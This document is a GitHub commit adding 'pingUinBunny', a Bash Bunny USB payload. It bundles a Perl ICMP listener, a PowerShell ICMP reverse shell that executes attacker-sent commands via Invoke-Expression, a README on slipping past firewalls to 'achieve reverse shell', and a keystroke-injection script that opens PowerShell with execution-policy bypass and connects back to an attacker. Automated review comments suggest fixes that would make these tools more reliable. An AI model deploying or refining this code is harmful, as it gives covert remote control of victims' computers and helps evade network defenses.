Uploaded pingUinBunny

A reverse shell using ICMP.
0iphor13 2021-12-11 19:55:11 +01:00 committed by GitHub
parent 82592d435d
commit 12641377aa
4 changed files with 253 additions and 0 deletions


@ -0,0 +1,66 @@
#!/usr/bin/env perl
#
# icmpsh - simple icmp command shell
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for pingUinBunny
#
#
#
#
use strict;
use IO::Socket;
use NetPacket::IP;
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Bunny waitin' for his friend...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
Proto => "ICMP",
Type => SOCK_RAW,
Blocking => 1) or die "$!";
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
print "Let's wait for PingUin!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
my $ip = NetPacket::IP->decode($buffer);
my $icmp = NetPacket::ICMP->decode($ip->{data});
if ($icmp->{type} == ICMP_ECHO) {
# get identifier and sequencenumber
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
# write data to stdout and read from stdin
print $data;
$input = <STDIN>;
# compile and send response
$icmp->{type} = ICMP_ECHOREPLY;
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
my $raw = $icmp->encode();
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
$sock->send($raw, 0, $addr) or die "$!\n";
}
}
}
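Review bot: `$input = <STDIN>;` can return undef because STDIN was switched to non-blocking a few lines earlier with `fcntl(STDIN, F_SETFL, O_NONBLOCK)`, and that undef is then packed into the reply by `pack("SSa*", $ident, $seq, $input)`; with only `use strict` and no `use warnings` the uninitialized-value use stays silent. Suggest `use warnings;` directly after `use strict;` and a defaulted read, `$input = <STDIN> // '';`. `Net::RawIP` is imported but never referenced anywhere in the file, and the README's dependency list omits it too, so either drop that `use` line or add a comment saying why it is required. The README also describes this listener as taking packets "from a specific host", whereas the loop answers every ICMP_ECHO regardless of `$ip->{src_ip}`; the documentation should describe what the code actually does.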


@ -0,0 +1,105 @@
function Invoke-pingUin
{
<#
Original script by nishang - modified by 0iphor13 for pingUinBunny
.PARAMETER IPAddress
The IP address of the server/listener to connect to.
.PARAMETER Delay
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.
.PARAMETER BufferSize
The size of output Buffer. Defualt is 128.
.EXAMPLE
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
# python icmpsh_m.py 192.168.254.226 192.168.254.1
Microsoft please don't block, oh dear microsoft corporation
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $true)]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $false)]
[Int]
$Delay = 5,
[Parameter(Position = 2, Mandatory = $false)]
[Int]
$BufferSize = 128
)
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
$MicrosoftCopyright =@"
I'll pingUin! <3
__
-=(o '.
'.-.\
/| \\
'| ||
by 0iphor13 _\_):,_
Windows PowerShell running as user $env:username on $env:computername `n
"@;
# Copyright Copies Right
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
#Show an interactive PowerShell prompt
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
while ($true)
{
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
#Check for Command from the server
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
$index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
$i = 0
#Fragmant larger output into smaller ones to send to the server.
if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
{
while ($i -lt $index )
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
$i +=1
}
$remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
if ($remainingindex -ne 0)
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
}
}
else
{
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
else
{
Start-Sleep -Seconds $Delay
}
}
}
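Review bot: The remainder slice `$NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]` uses `.Length` as its upper index, which is one past the last element; PowerShell appears to drop out-of-range indices from a range slice so the effect is probably cosmetic, but `($NeverGonnaGiveYouUp.Length - 1)` would match the `(($i+1)*$BufferSize-1)` bound used in the loop just above it. The three fragment `Send` calls pass a timeout of `60 * 10000` while every other `Send` in the function passes `60 * 1000`, which looks accidental and deserves either a single named timeout variable or a comment explaining the difference. The comment-based help block has no `.SYNOPSIS` or `.DESCRIPTION` section, and the BufferSize text spells "Defualt" instead of "Default".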


@ -0,0 +1,39 @@
**Title: pingUinBunny**
Author: 0iphor13
Version: 1.0
What is pingUinBunny?
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (Invoke-pingUin.ps1) and sends it commands to execute.*
#
There you go, a reverse shell.
Instruction:
Upload Bunny.pl onto your attacking machine.
Install dependencies, if needed:
IO::Socket,
NetPacket::IP,
NetPacket::ICMP
Disable ICMP replies by the OS:
*sysctl -w net.ipv4.icmp_echo_ignore_all=1*
Start Bunny.pl -> perl Bunny.pl
#
Plug in Bashbunny with pingUinBunny equipped.
Achieve reverse shell.
run away <3
Credit for code and ideas:
bdamele
nishang
krabelize


@ -0,0 +1,43 @@
#!/bin/bash
#
# Title: pingUinBunny
# Description: Get remote access using a icmp reverse shell.
# Author: 0iphor13
# Version: 1.0
# Category: Remote_Access
# Attackmodes: HID, Storage
LED SETUP
DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
DELAY 5000
RUN WIN "powershell -Exec Bypass"
DELAY 6000
Q ENTER
DELAY 10000
Q STRING "Import-Module ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Invoke-pingUin.ps1')"
DELAY 10000
Q ENTER
DELAY 10000
Q STRING "Invoke-pingUin -IpAddress 0.0.0.0"
DELAY 10000
Q ENTER
DELAY 5000
ATTACKMODE HID
LED FINISH
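Review bot: The header comment records title, author and attack modes but not the two values a reader has to know about: `DUCKY_LANG de` fixes a German keyboard layout, and `Invoke-pingUin -IpAddress 0.0.0.0` carries a placeholder address that the README's instructions never mention. A header line such as `# Config: DUCKY_LANG (keyboard layout) and the -IpAddress value passed to Invoke-pingUin (the address Bunny.pl listens on)` would make both explicit. The `Description:` line reads "a icmp" and should read "an ICMP".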